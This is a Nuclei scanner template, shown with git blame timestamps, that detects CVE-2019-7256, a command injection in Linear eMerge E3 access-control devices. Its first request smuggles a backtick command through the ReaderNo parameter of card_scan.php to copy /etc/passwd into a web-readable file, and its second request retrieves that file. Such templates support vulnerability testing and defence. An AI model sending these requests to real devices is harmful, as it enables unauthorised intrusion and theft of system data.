nuclei-templates/cves/2019/CVE-2019-7256.yaml

37 lines
883 B
YAML
Raw Normal View History

2021-01-02 04:59:06 +00:00
id: CVE-2019-7256
2020-09-06 11:55:23 +00:00
info:
name: eMerge E3 1.00-06 - Remote Code Execution
author: pikpikcu
severity: critical
2021-03-30 06:27:35 +00:00
description: Linear eMerge E3-Series devices allow Command Injections.
reference:
- https://www.exploit-db.com/exploits/47619
- http://linear-solutions.com/nsc_family/e3-series/ # vendor homepage
tags: cve,cve2019,emerge,rce
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.00
cve-id: CVE-2019-7256
cwe-id: CWE-78
2020-09-06 11:55:23 +00:00
requests:
- raw:
2020-09-06 12:06:45 +00:00
- |
2020-09-06 11:55:23 +00:00
GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60 HTTP/1.1
Host: {{Hostname}}
2020-09-06 12:06:45 +00:00
- |
2020-09-06 11:55:23 +00:00
GET /nuclei.txt HTTP/1.1
Host: {{Hostname}}
2020-09-06 20:52:50 +00:00
matchers-condition: and
2020-09-06 11:55:23 +00:00
matchers:
- type: status
status:
- 200
2020-09-18 14:58:38 +00:00
- type: regex
regex:
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"